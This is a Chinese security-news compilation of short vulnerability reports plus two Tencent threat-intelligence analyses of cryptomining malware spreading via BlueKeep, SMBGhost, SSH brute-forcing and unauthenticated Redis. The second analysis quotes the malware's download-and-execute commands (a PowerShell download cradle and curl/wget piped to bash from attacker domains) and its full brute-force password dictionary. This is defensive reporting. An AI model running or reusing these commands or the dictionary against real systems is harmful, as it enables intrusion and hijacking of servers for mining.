感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner（死神矿工）挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe，大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe，然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt，将该挖矿木马命名为ThanatosMiner（死神矿工）。 2019年5月15日，微软发布了针对远程桌面服务（Remote Desktop Services ）的关键远程执行代码漏洞CVE-2019-0708的安全更新，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作——意味着，存在漏洞的电脑只需要连网，勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞（CVE-2019-0708）是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统，包括： Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner（死神矿工）挖矿木马的查杀拦截，腾讯安全专家强烈建议用户及时修补BlueKeep漏洞，避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe，使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳，而打包的系统库文件中这两项内容会被保留，所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头，然后将其命名为scan.pyc，并通过uncompyle6进行反编译，可以还原的Python代码scan.py。 分析发现，Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00，Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址，以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令，在%Temp%目录下创建DO.vbs，下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写，代码经过Dotfuscator混淆处理，可使用开源工具De4dot去除部分混淆，程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击，以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警（CVE-2019-0708） https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新：Windows RDS漏洞（CVE-2019-0708） https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近，腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞（CVE-2019-0708）攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警，腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级，集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w

近日 Dubbo 官方报告了一个 Dubbo 远程代码执行问题（CVE-2020-1948），该问题由 Provider 反序列化漏洞引起。根据介绍，攻击者可以使用无法识别的服务名称或方法名称，并带上一些恶意参数有效载荷发送 RPC 请求。当恶意参数反序列化后，将执行一些恶意代码。 受影响的版本： 2.7.0 <= Dubbo Version <= 2.7.6 2.6.0 <= Dubbo Version <= 2.6.7 所有 2.5.x 版本（官方团队不再支持） 所有 Dubbo 版本都可以升级到 2.7.7 或更高版本，避免该漏洞：https://github.com/apache/dubbo/releases/tag/dubbo-2.7.7 详情查看邮件列表。     （稿源：开源中国，封面源自网络。）

Apache Tomcat 安全团队报告了一个 Tomcat HTTP/2 DoS 漏洞。 HTTP/2 请求的特制序列可能会在数秒内引发较高的 CPU 使用率，如果有足够数量的此类请求在并发 HTTP/2 连接上进行连接时，服务器可能无响应，即造成拒绝服务。 该漏洞严重等级定为“重大”（Important），编号 CVE-2020-11996。 受影响的软件版本包括： Apache Tomcat 10.0.0-M1 到 10.0.0-M5 Apache Tomcat 9.0.0.M1 到 9.0.35 Apache Tomcat 8.5.0 到 8.5.55 官方给出的缓解方法： 升级到 Apache Tomcat 10.0.0-M6 或更高版本 升级到 Apache Tomcat 9.0.36 或更高版本 升级到 Apache Tomcat 8.5.56 或更高版本 具体细节可以查看： http://tomcat.apache.org/security-10.html http://tomcat.apache.org/security-9.html http://tomcat.apache.org/security-8.html     （稿源：开源中国，封面源自网络。）

上月发布的 Windows 10 May 2020（20H1/Version 2004）功能更新在安全方面引入了诸多改进，其中就包括阻止潜在不必要程序（PUP/PUA）的能力。微软表示 PUP 包括各种类型的系统软件捆绑、驱动程序和注册表优化器等。 不过近日 Version 2004 用户反馈，即使在 PUP 应用程序被清理之后，Windows Security 应用程序依然会触发警报。在 PUP 应用程序被移除或者允许在 Windows 10 上运行之后，Windows Security 在随后的扫描中依然会检测到旧项目，造成错误的检测循环。 一位用户指出：“我在进行常规扫描时，发现这些威胁被高亮显示为低级，而且 Defender 无法删除它们，导致一直显示。我同样使用了 Malwarebytes 进行扫描，但这边并没有显示出来。” 看来，Windows Defender 已经被默认为在Windows 10 Version 2004 中识别 PUP 为威胁。在 PUP 被删除后，Windows Defender 在随后的历史记录扫描中又将同一文件识别为威胁。 想要修复这个问题，你需要通过以下步骤删除PUPs历史信息： 1.打开 “文件资源管理器”。 2.导航到C:/程序数据/Microsoft/Windows Defender/Scans/History/Service。 3.在服务文件夹中，删除PUP相关文件。 4.重启Windows并在Windows安全应用中进行快速扫描。     （稿源：cnBeta，封面源自网络。）  

Red Hat 近日报告了一个内核中的安全问题，根据描述，Red Hat 内核在“关联数据的身份验证加密”（AEAD，Authenticated Encryption with Associated Data）中存在缺陷，这是一种加密技术。具体是在 IPsec 加密算法模块 authenc 的 crypto/authenc.c 中的 crypto_authenc_extractkeys 中发现了缓冲区超读漏洞。当有效载荷大于 4 字节且未遵循 4 字节对齐边界准则时，它将导致缓冲区超读威胁，从而导致系统崩溃。此漏洞使具有用户特权的本地攻击者可以执行拒绝服务。 目前该漏洞已录入 CVE-2020-10769。 不过该问题在 17 个月前也就是 19 年 1 月的 Linux LTS 内核上游中已经修复过了，详情见 https://lkml.org/lkml/2019/1/21/675。 并且在 14 个月前，该问题的回归测试也已经提交到了 LTP（Linux Test Project，Linux 测试项目），此次发现这一特定下游问题，应当是 LTP 测试未通过导致的。因此报告安全的邮件中提醒：“大多数 Linux 内核已经修复了这一错误，而没有在 LTP 中添加回归测试，这意味着挑选特定内核补丁来修复 LTP 问题不如合并所有 LTS 内核修复程序来得稳妥。”   （稿源：开源中国，封面源自网络。）

本月初微软通过 Windows Update 将新版 Microsoft Edge 推送给用户，并自动取代旧版 Edge。当然，如果系统原本默认的浏览器不是 Microsoft Edge，那么升级到新版后也不会改变这一设置。 不过部分用户最近反馈的一个情况却会让人误以为微软正在另辟蹊径让他们将 Microsoft Edge 作为默认浏览器。根据用户的反馈，无论在 edge://settings/onStartup 中进行了哪种设置，无论何时启动 PC 并登录 Windows，部分 Microsoft Edge 都会随系统启动而启动。也就是说，开机并进入桌面后，Microsoft Edge 便会自动启动。 微软收到反馈的消息后，很快就确认了这是一个 bug。不过工程师目前也不能确认此错误的发生是否伴随了系统其他的行为更改。 上文提到的 edge://settings/onStartup 设置影响的是打开浏览器后的行为，与操作系统的设置并没有直接关系。 由于用户提供的信息有限，因此工程师无法定位导致 bug 产生的原因。不过根据外国科技媒体 Softpedia 的报道，这种情况发生在通过 Windows Update 自动下载安装更新的设备上。 如果你也受到此问题的影响，并且希望帮忙解决问题，可查看博客文章以获取详细信息。在博客文章中，微软提供了有关如何通过浏览器内置反馈工具共享诊断数据的完整说明。     （稿源：开源中国，封面源自网络。）

6月15日消息，上周Android 11 Beta 1正式上线，谷歌Pixel机型率先尝鲜。考虑到这是Beta版Android 11，系统方面不够稳定，不少Pixel用户升级到Android 11之后选择降级回到Android 10，然而在降级之后发现了新的Bug。 据9to5Google报道，不少用户反馈谷歌Pixel 4、Pixel 4 XL降级回到Android 10之后面部识别不能用，系统提示面部信息无法录入。 谷歌方面承认了这一错误，表示会在后续版本中修复这一bug。9to5Google提醒用户，升级到Android 11的Pixel 4系列用户谨慎降级，否则面部识别无法使用。由于Pixel 4、Pixel 4 XL仅支持3D人脸识别，没有指纹，所以降级后如果出错只能用传统的密码或者图案解锁，安全性方面会降低。 值得一提的是，除了Pixel 4系列之外，一加8系列、Realme X50 Pro系列、小米10系列、小米POCO F2 Pro、Find X2系列等都将在本月尝鲜Android 11，值得期待。     （稿源：快科技，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA   一、概述 2020年6月10日，腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击，之前的若干种病毒只是利用SMBGhost漏洞做扫描检测，并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。 由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限，可直接攻击SMB服务造成RCE（远程代码执行），存在漏洞的计算机只要联网就可能被黑客探测攻击，并获得系统最高权限。该攻击行动使得“永恒之蓝”系列木马针对Windows系统的攻击能力再次增强。 腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示，至今仍有近三分之一的系统未修补该漏洞，我们再次强烈建议所有用户尽快修补SMBGhost漏洞（CVE-2020-0796）。 此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击，在失陷系统创建定时任务并植入挖矿木马功能，使得其攻击的范围继续扩大，包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马，并会按照惯例在开始挖矿前，清除其他挖矿木马，以便独占系统资源。挖矿活动会大量消耗企业服务器资源，使正常业务受严重影响。 二、样本分析 攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击，攻击成功后远程执行以下shellcode: powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'') 针对Linux系统服务器的攻击 1、利用SSH爆破 扫描22端口进行探测，针对Linux系统root用户，尝试利用弱密码进行爆破连接，爆破使用密码字典： “saadmin”,”123456″,”test1″,”zinch”,”g_czechout”,”asdf”,”Aa123456.”,”dubsmash”,”password”,”PASSWORD”,”123.com”,”admin@123″,”Aa123456″,”qwer12345″,”Huawei@123″,”123@abc”,”golden”,”123!@#qwe”,”1qaz@WSX”,”Ab123″,”1qaz!QAZ”,”Admin123″,”Administrator”,”Abc123″,”Admin@123″,”999999″,”Passw0rd”,”123qwe!@#”,”football”,”welcome”,”1″,”12″,”21″,”123″,”321″,”1234″,”12345″,”123123″,”123321″,”111111″,”654321″,”666666″,”121212″,”000000″,”222222″,”888888″,”1111″,”555555″,”1234567″,”12345678″,”123456789″,”987654321″,”admin”,”abc123″,”abcd1234″,”abcd@1234″,”abc@123″,”p@ssword”,”P@ssword”,”p@ssw0rd”,”P@ssw0rd”,”P@SSWORD”,”P@SSW0RD”,”P@w0rd”,”P@word”,”iloveyou”,”monkey”,”login”,”passw0rd”,”master”,”hello”,”qazwsx”,”password1″,”Password1″,”qwerty”,”baseball”,”qwertyuiop”,”superman”,”1qaz2wsx”,”fuckyou”,”123qwe”,”zxcvbn”,”pass”,”aaaaaa”,”love”,”administrator”,”qwe1234A”,”qwe1234a”,” “,”123123123″,”1234567890″,”88888888″,”111111111″,”112233″,”a123456″,”123456a”,”5201314″,”1q2w3e4r”,”qwe123″,”a123456789″,”123456789a”,”dragon”,”sunshine”,”princess”,”!@#$%^&*”,”charlie”,”aa123456″,”homelesspa”,”1q2w3e4r5t”,”sa”,”sasa”,”sa123″,”sql2005″,”sa2008″,”abc”,”abcdefg”,”sapassword”,”Aa12345678″,”ABCabc123″,”sqlpassword”,”sql2008″,”11223344″,”admin888″,”qwe1234″,”A123456″,”OPERADOR”,”Password123″,”test123″,”NULL”,”user”,”test”,”Password01″,”stagiaire”,”demo”,”scan”,”P@ssw0rd123″,”xerox”,”compta” 爆破登陆成功后执行远程命令： `Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash` 2、利用Redis未授权访问漏洞 扫描6379端口进行探测，在函数redisexec中尝试连接未设置密码的redis服务器，访问成功后执行远程命令： `export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash` SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png，该脚本主要有以下功能： a.创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp b.创建crontab定时启动Linux平台挖矿木马/.Xll/xr 通过定时任务执行的a.asp首先会清除竞品挖矿木马： 然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP，重新与该机器建立连接进行内网扩散攻击： 创建目录/.Xll并下载挖矿木马（d[.]ackng.com/ln/xr.zip）到该目录下，解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。 永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态，目前该木马会通过以下方法进行扩散传播： 截止2020年6月12日，永恒之蓝木马下载器家族主要版本更新列表如下： IOCs Domain t.amynx.com t.zer9g.com t.zz3r0.com d.ackng.com URL http[:]//t.amynx.com/smgh.jsp http[:]//t.amynx.com/a.jsp http[:]//t.amynx.com/ln/a.asp http[:]//t.amynx.com/ln/core.png http[:]//d.ackng.com/if.bin http[:]//d.ackng.com/smgh.bin http[:]//d.ackng.com/ln/xr.zip

正在英特尔努力消除多个处理器漏洞造成的负面影响的时候，三所大学的安全研究人员再次无情地曝光了 SGX 软件防护扩展指令的另外两个缺陷。对于攻击者来说，这可以让他们相当轻松地提取敏感数据。庆幸的是，新问题可通过积极的补救措施得到修复，且当前尚无新漏洞已在野外被利用的相关证据。 来自美国密歇根、荷兰阿姆斯特丹、以及澳大利亚阿德莱德三所大学的研究人员披露 —— 攻击者可利用多核体系架构的工作方式，来获得对受感染系统上敏感数据的访问权限。 其已经为两个漏洞开发了对应的攻击方法，并给出了 SGAxe 和 CrossTalk 的概念证明。 前者似乎是今年早些时候曝光的 CacheOut 攻击的高级版本，黑客可从 CPU 的 L1 缓存中提取内容。 研究人员解释称，SGAxe 是英特尔减轻针对软件防护扩展（SGX）的旁路攻击的一个失败尝试。作为 CPU 上的一个专属区域，SGX 原意是确保正在处理的代码和数据的完整与机密性。 借助瞬态执行攻击，黑客可从实质上恢复存储在 SGX 区域中的加密密钥，并将之用于解密长存储区，以获得机器的 EPID 密钥。后者被用于确保事务的安全性，比如金融交易和受 DRM 保护的内容。 至于第二个 CrossTalk 漏洞，其属于微体系架构数据采样（MDS）的一个衍生，能够针对 CPU 的行填充缓冲区（LBF）处理的数据发起攻击。 其原本希望提供 CPU 内核访问的“登台缓冲区”，但黑客却能够利用在一个单独核心上运行的特制软件，来破坏保护其运行的软件代码和数据私钥。 据悉，新漏洞影响 2015 ~ 2019 年发布的多款英特尔处理器，包括部分至强 E3 SKU（E5 和 E7 系列已被证明可抵御此类新型攻击）。 英特尔在 6 月份的安全公告中称，只有极少数的人能够在实验室环境中发起这些攻击，目前尚无漏洞在野外被利用的报告。 即便如此，该公司仍将尽快发布微码更新，同时让之前签发的证明密钥失效。     （稿源：cnBeta，封面源自网络。）

OmniBallot是美国几十个司法管辖区都在使用的选举软件。除了递送选票和帮助选民标记选票外，它还包括一个在线投票的选项。至少有三个州，西弗吉尼亚州、特拉华州和新泽西州已经或计划在即将举行的选举中使用该技术。俄勒冈州和华盛顿州的四个地方司法管辖区也使用在线投票功能。但麻省理工学院的迈克尔-斯佩克特和密歇根大学的亚历克斯-哈尔德曼这对计算机科学家的新研究发现，该软件安全保护措施不足，对选举的完整性造成了严重的风险。 OmniBallot背后的公司Democracy Live在给Ars Technica的邮件回复中为其软件辩护。Democracy Live首席执行官Bryan Finney写道：”报告没有发现OmniBallot的任何技术漏洞”。从某种意义上来说，这是真的，研究人员并没有在OmniBallot代码中发现任何重大漏洞。但这也忽略了他们分析的重点。软件的安全性不仅取决于软件本身，还取决于系统运行环境的安全性。例如，如果投票软件运行在被恶意软件感染的电脑上，就不可能保证投票软件的安全。而在美国，有数百万台电脑被恶意软件感染。 这个问题现在特别紧迫，因为正在进行的COVID-19大流行迫使选举官员对选举程序作出重大改变。目前，大多数使用OmniBallot软件的司法管辖区都没有使用其 “电子选票传递 “功能。但启用该功能只需更改配置即可。选举官员有可能在远程投票更容易的压力下，决定在今年11月大选中启用该软件的在线投票功能。 Specter和Halderman取得了OmniBallot软件的副本，对其进行了逆向工程，然后创建了模仿真实服务器行为的新服务器软件。这使他们能够在不冒干扰真实选举的情况下对软件进行实验。他们发现，OmniBallot提供了一些不同的功能，州选举官员可以选择向选民提供。最基本的是空白选票交付功能，可向选民提供可打印出来并寄回投票站的PDF选票。各地也可提供选票标记功能，在选票打印出来之前，代选民标记。这可以让失明选民独立填写选票。它还可以防止多投，并警告选民没有投票。 但是Specter和Halderman认为这种能力会带来一些额外的风险。恶意软件可以被编程成在很短的时间内切换投票。理论上，选民应该在投递选票前检查选票是否正确，但研究表明，选民对此并不严格。霍尔德曼和其他人的一项研究发现，在一次现实的模拟选举中，只有6.6%的选民向选举监督人报告了投票的变化。     （稿源：cnBeta，封面源自网络。）